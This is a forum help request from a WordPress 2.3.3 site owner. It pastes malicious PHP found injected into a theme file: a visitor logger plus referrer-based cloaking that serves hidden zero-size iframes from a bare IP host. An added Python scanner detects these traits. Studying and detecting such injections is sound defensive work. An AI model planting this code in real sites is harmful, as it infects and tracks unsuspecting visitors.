2.3.3 Hacked
I just noticed this in my wp-gm file. I landed on a page from Google and got a nasty surprise. Any help would be appreciated.
<?
echo "<!-- counter -->";
$dat_file="images/z1.txt";
$log_file="images/z2.txt";
$f=fopen($dat_file,"r+");
$count=fgets($f,100);
fclose($f);
$count=ereg_replace("\n","",$count);
$count++;
$f=fopen($dat_file,"w");
fputs($f,"$count");
fclose($f);
?>
<?
$f=fopen($log_file,"a+");
$ip=getenv("REMOTE_ADDR");
$ag=getenv("HTTP_USER_AGENT");
$host=getenv("HTTP_REFERER");
$data=date("d-m-Y");
$time=date("H:i:s");
fputs($f,"$count#$data#$time#$ip#$ag#$host#\n");
fclose($f);
?>
<?
$expl=1;
$referer = getenv( "HTTP_REFERER" );
if (strstr($referer, "adbrite"))
{
    $expl=2;
}
if (strstr($referer, "copyscape.com"))
{
    $expl=2;
}
$rlen=strlen($referer);
if ($rlen==0)
{
    $expl=2;
}
?>
<?
if($expl!=2)
{
    echo "<iframe src=\"https://64.86.135.13/~craifain/fonts/.mp/index.php\" width=0 height=0></iframe>";
    echo "<iframe src=\"https://64.86.135.13/~craifain/fonts/.ip\" width=0 height=0></iframe>";
    echo "<iframe src=\"https://64.86.135.13/~craifain/fonts/.xc/top/\" width=0 height=0></iframe>";
}
?>
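Added example, not part of the original post: a Python check for three traits visible in the snippet above (a zero-size iframe, an iframe source that is a bare IP address, and output that depends on the Referer header), so other PHP files in the install can be checked for the same injection. The rule set, the names `scan_php` and `scan_tree`, and the sample strings are assumptions constructed for illustration; the sample uses a documentation address.

```python
import re
from pathlib import Path

# Forum software turns straight quotes into typographic ones; normalise them so
# the same rules work on a pasted sample and on a file read from disk.
QUOTES = str.maketrans({"\u201c": '"', "\u201d": '"', "\u2018": "'", "\u2019": "'"})

IFRAME = re.compile(r"<iframe\b[^>]*>", re.I)
ZERO_DIM = re.compile(r"\b(?:width|height)\s*=\s*\\?[\"']?0(?:px)?\b", re.I)
HIDDEN_CSS = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
IP_SRC = re.compile(r"\bsrc\s*=\s*\\?[\"']?https?://\d{1,3}(?:\.\d{1,3}){3}\b", re.I)
REFERER_VAR = re.compile(
    r"\$(\w+)\s*=\s*(?:getenv\s*\(|\$_SERVER\s*\[)\s*[\"']HTTP_REFERER[\"']", re.I)


def scan_php(source: str) -> list[str]:
    """Return the names of the injection indicators present in one PHP source."""
    src = source.translate(QUOTES)
    found = set()
    for tag in IFRAME.findall(src):
        if ZERO_DIM.search(tag) or HIDDEN_CSS.search(tag):
            found.add("hidden_iframe")
        if IP_SRC.search(tag):
            found.add("iframe_to_bare_ip")
    # Output that depends on the Referer header is how the injection stays out
    # of the site owner's view: find a variable filled from it and tested in if().
    for var in REFERER_VAR.findall(src):
        if re.search(r"\bif\s*\([^;{]*\$" + re.escape(var) + r"\b", src):
            found.add("referer_conditional")
    return sorted(found)


def scan_tree(root: str) -> dict[str, list[str]]:
    """Scan every .php file under root; return only the files with findings."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        result = scan_php(path.read_text(errors="replace"))
        if result:
            hits[str(path)] = result
    return hits


# Constructed sample (documentation address, curly quotes as a forum shows them).
SAMPLE = """<?
$referer = getenv( \u201cHTTP_REFERER\u201d );if (strstr($referer, \u201cexample\u201d)) { $expl=2; }
if($expl!=2) { echo \u201c<iframe src=\\\u201dhttps://192.0.2.10/x/\\\u201d width=0 height=0></iframe>\u201d; }
?>"""
CLEAN = '<?php echo "<iframe src=\\"https://video.example/embed\\" width=560 height=315></iframe>";'
```

Calling `scan_tree` on the WordPress directory lists each flagged file with its indicators; a hit is a reason to compare that file against a clean copy of the same release, not proof of compromise on its own.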